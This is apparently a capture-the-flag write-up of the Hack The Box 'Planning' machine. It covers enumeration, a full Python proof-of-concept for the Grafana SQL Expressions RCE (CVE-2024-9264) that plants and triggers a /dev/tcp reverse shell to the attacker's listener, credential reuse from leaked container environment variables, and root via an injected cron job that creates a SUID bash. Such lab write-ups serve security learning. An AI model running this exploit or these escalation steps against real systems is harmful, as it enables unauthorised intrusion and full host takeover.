Planning
Summary
“Planning” is an easy-level Linux box from HTB’s Season 7. It challenges users to perform web and subdomain enumeration, leverage a Grafana RCE (CVE‑2024‑9264), pivot out of a Docker container using reused credentials, and abuse a root-run cron scheduler to obtain root privileges.
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
Executive Summary
The Planning machine presented a realistic, multi-layered attack scenario that showcased the risks of misconfigured services and insecure DevOps practices in containerized environments.
We began with external enumeration, identifying a vulnerable Grafana instance exposed on the subdomain grafana.planning.htb. Using the known credentials provided in the challenge and chaining them with CVE-2024-9264 (Grafana SQL Expressions RCE), we achieved initial access by executing a reverse shell inside a running container.
Inside the container, we enumerated the environment variables and discovered reused Grafana admin credentials, which allowed lateral movement to the host system via SSH. As user enzo, we performed further enumeration and uncovered a custom crontab scheduling service, implemented via an unprotected JSON database.
Additionally, by inspecting network bindings, we discovered several internal services listening on 127.0.0.1, including a custom service on port 8000. However, the most impactful discovery was that the crontab system allowed arbitrary command injection, and those commands were executed by root without validation.
We exploited this by injecting a payload that copied /bin/bash to /tmp/pwner and set the SUID bit, then executed it with the -p flag, granting us a fully privileged root shell on the host.
Challenge Information
Name: Planning
Platform: Hack The Box (HTB)
Category: Linux
Difficulty: Easy
Objective: Exploit the Linux host to retrieve the user and root flags.
Key Exploit: Grafana SQL Expressions RCE (CVE-2024-9264)
Name: Planning
Difficulty: Easy
Operating System: Linux
Points: 20
Release Date: May 10, 2025
Created by: d00msl4y3r & FisMatHack
Enumeration
The first phase in attacking any target is thorough enumeration. In this case, we initiated a comprehensive TCP port scan using Nmap to identify open services and potential attack surfaces.
nmap -sC -sV -p- 10.10.11.68
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMv/TbRhuPIAz+BOq4x+61TDVtlp0CfnTA2y6mk03/g2CffQmx8EL/uYKHNYNdnkO7MO3DXpUbQGq1k2H6mP6Fg=
| 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKpJkWOBF3N5HVlTJhPDWhOeW+p9G7f2E9JnYIhKs6R0
80/tcp open http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
This revealed only two open ports: 22 (SSH) and 80 (HTTP). Nmap also reported that the web server redirects to http://planning.htb/, which indicates that name-based virtual hosting is in use. To properly interact with the web service, we mapped planning.htb to the target's IP in our local /etc/hosts:
echo "10.10.11.68 planning.htb" | sudo tee -a /etc/hosts

Subdomain Enumeration with ffuf
Since virtual hosting was in play, it was logical to perform subdomain brute-forcing to uncover hidden services. We used ffuf with a common subdomain wordlist:
└─$ ffuf -u http://planning.htb -H "Host: FUZZ.planning.htb" -w ~/Desktop/Exploit/word/Discovery/DNS/services-names.txt -fw 6 | tee fuzing.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://planning.htb
:: Wordlist : FUZZ: /home/sofarz/Desktop/Exploit/word/Discovery/DNS/services-names.txt
:: Header : Host: FUZZ.planning.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6
________________________________________________
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 48ms]
This uncovered the subdomain grafana.planning.htb, which strongly implied the presence of a Grafana instance, a known attack surface in recent CVEs.
We updated /etc/hosts again to resolve this subdomain:
echo "10.10.11.68 grafana.planning.htb" | sudo tee -a /etc/hosts
Navigating to http://grafana.planning.htb confirmed the existence of a Grafana login panel.
Initial Foothold
With the subdomain grafana.planning.htb discovered during enumeration, the next logical step was to investigate the Grafana web application hosted there. Grafana is a widely used observability platform, and older or misconfigured instances have been subject to critical vulnerabilities.
The challenge description provided the following credentials:
Username: admin
Password: 0D5oT70Fq13EvB5r
We navigated to http://grafana.planning.htb/login and attempted to authenticate:

Upon successful login, we gained access to the Grafana 11.0.0 dashboard. This version is known to be vulnerable to a Remote Code Execution (RCE) flaw—CVE-2024-9264—when the server is configured with certain plugins or integrations.
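As a quick fingerprint, the running version can usually also be confirmed from the command line; this assumes the default setup in which Grafana's health endpoint is reachable without authentication and reports the build version:
curl -s http://grafana.planning.htb/api/health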

CVE-2024-9264
In Grafana 11.0.0, a new feature called SQL Expressions allows users to write SQL that post-processes the output of other queries. These expressions are evaluated by a DuckDB binary on the server, and because the input is not properly sanitized, an authenticated attacker can submit arbitrary DuckDB statements; chained with the community shellfs extension (as in the PoC below), this yields arbitrary shell command execution.
This vulnerability was assigned CVE-2024-9264 and leads to full code execution in the context of the Grafana process.
# poc.py
# Usage: python3 poc.py --url http://grafana.planning.htb --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.xx.xx --reverse-port 4444
import requests
import argparse


def authenticate(grafana_url, username, password):
    # Log in to Grafana and keep the authenticated session cookie
    login_url = f'{grafana_url}/login'
    payload = {'user': username, 'password': password}
    session = requests.Session()
    response = session.post(login_url, json=payload)
    if response.ok:
        print("[+] Login successful")
        return session
    else:
        print("[-] Login failed:", response.status_code)
        return None


def create_reverse_shell(session, grafana_url, reverse_ip, reverse_port):
    # Stage 1: abuse a SQL Expression (evaluated by DuckDB) to write a
    # reverse-shell one-liner to /tmp/rev on the Grafana host
    reverse_shell_command = f"/dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
    payload = {
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                "expression": f"SELECT 1;COPY (SELECT 'sh -i >& {reverse_shell_command}') TO '/tmp/rev';",
                "hide": False,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ]
    }
    response = session.post(
        f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
        json=payload
    )
    if response.ok:
        print("[+] Reverse shell payload created")
    else:
        print("[-] Payload creation failed:", response.status_code)


def trigger_reverse_shell(session, grafana_url):
    # Stage 2: load the DuckDB community extension shellfs and "read" from a
    # shell pipe, which executes /tmp/rev and connects back to the listener
    payload = {
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                "expression": "SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');",
                "hide": False,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ]
    }
    response = session.post(
        f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
        json=payload
    )
    if response.ok:
        print("[+] Reverse shell triggered")
    else:
        print("[-] Trigger failed:", response.status_code)


def main(grafana_url, username, password, reverse_ip, reverse_port):
    session = authenticate(grafana_url, username, password)
    if session:
        create_reverse_shell(session, grafana_url, reverse_ip, reverse_port)
        trigger_reverse_shell(session, grafana_url)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', required=True, help='Grafana URL')
    parser.add_argument('--username', required=True, help='Grafana username')
    parser.add_argument('--password', required=True, help='Grafana password')
    parser.add_argument('--reverse-ip', required=True, help='Reverse shell IP')
    parser.add_argument('--reverse-port', required=True, help='Reverse shell port')
    args = parser.parse_args()
    main(args.url, args.username, args.password, args.reverse_ip, args.reverse_port)
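Before launching the PoC, a netcat listener has to be waiting on the attacking machine, on the same port passed via --reverse-port (4444 in the example invocation above):
nc -lvnp 4444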
Once the reverse shell was successfully established using the Grafana SQL Expressions RCE (CVE-2024-9264), our shell dropped us into what appeared to be a Docker container:
sh: 0: can't access tty; job control turned off
# whoami
root
# ls -la
total 64
drwxr-xr-x 1 root root 4096 Mar 1 18:01 .
drwxr-xr-x 1 root root 4096 May 14 2024 ..
drwxrwxrwx 2 grafana root 4096 May 14 2024 .aws
drwxr-xr-x 3 root root 4096 Mar 1 18:01 .duckdb
-rw-r--r-- 1 root root 34523 May 14 2024 LICENSE
drwxr-xr-x 2 root root 4096 May 14 2024 bin
drwxr-xr-x 3 root root 4096 May 14 2024 conf
drwxr-xr-x 16 root root 4096 May 14 2024 public
# pwd
/usr/share/grafana
This confirmed that Grafana was running in an isolated containerized environment. To understand the container’s configuration, we began by dumping the environment variables, which often reveal service credentials, file paths, and runtime configurations.
cd /usr/share/grafana
root@7ce659d667d7:~# env
env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
TERM=xterm-256
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
XTERM=term-256
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
OLDPWD=/var/lib/grafana
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
Key Findings
- GF_SECURITY_ADMIN_USER & GF_SECURITY_ADMIN_PASSWORD: confirmed login credentials for the Grafana web UI
- GF_PLUGINS_ALLOW_LOADING_UNSIGNED_PLUGINS: confirms that the shellfs plugin is enabled, allowing the exploitation used for RCE
- GF_PATHS_CONFIG: path to Grafana's main configuration file (grafana.ini)
- GF_PATHS_DATA: data storage directory within the container
The leaked credentials enzo : RioTecRANDEntANT! appeared to belong to a reused system account and became immediately valuable for lateral movement outside the container.
Lateral Move: SSH Access as Enzo
Based on the credentials found in the environment, we attempted to authenticate to the host via SSH. This succeeded, granting us access to the host system as enzo and confirming that the Docker container had been configured with reused, privileged system credentials.
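For reference, this was a plain password-based SSH login using the credentials leaked through the container's environment (password RioTecRANDEntANT!):
ssh enzo@planning.htb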
Privilege Escalation: Crontab Analysis
Upon gaining access to the host, we inspected scheduled tasks for misconfigurations or abuse opportunities. In /opt/crontabs, we discovered a JSON-based crontab scheduler database:
enzo@planning:/opt/crontabs$ cat crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
To further assess potential privilege escalation vectors, we enumerated all services listening on the host system:
enzo@planning:/opt/crontabs$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:38621 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
Of particular interest is 127.0.0.1:8000, which is only accessible from localhost and likely intended as an internal service or admin panel.
Accessing Internal Service via SSH Port Forwarding
To investigate the service running on port 8000, we used SSH port forwarding from our attacker machine:
ssh -L 8000:127.0.0.1:8000 enzo@planning.htb
This command forwards our local port 8000 to 127.0.0.1:8000 on the remote host, allowing us to interact with the internal service via a browser or tools like curl.
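As a quick sanity check (assuming nothing else is already bound to local port 8000), the tunnel can be probed with curl before opening it in a browser:
curl -I http://127.0.0.1:8000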
After forwarding, we visited http://localhost:8000 in the browser:

To gain root access, we used the cron execution engine to create a SUID binary backdoor. Specifically:
1. Copy /bin/bash to a world-accessible location
2. Set the SUID permission bit
3. Execute the resulting binary with -p to escalate
We added steps 1 and 2 as the command of a new job (sketched just below) and used "Run now" to have the scheduler execute it immediately as root.
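A payload along these lines is sufficient, since the scheduler runs job commands as root; /tmp/pwner is simply the name used throughout this writeup:
cp /bin/bash /tmp/pwner && chmod 4755 /tmp/pwner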

Once the binary was created and marked with the SUID bit, we ran:
/tmp/pwner -p
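The -p flag matters here: bash normally drops the effective UID back to the real UID when the two differ, and -p tells it to keep the elevated effective UID granted by the SUID bit. Running id from the new shell should report euid=0(root), confirming the escalation:
id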

We now had full root access on the host.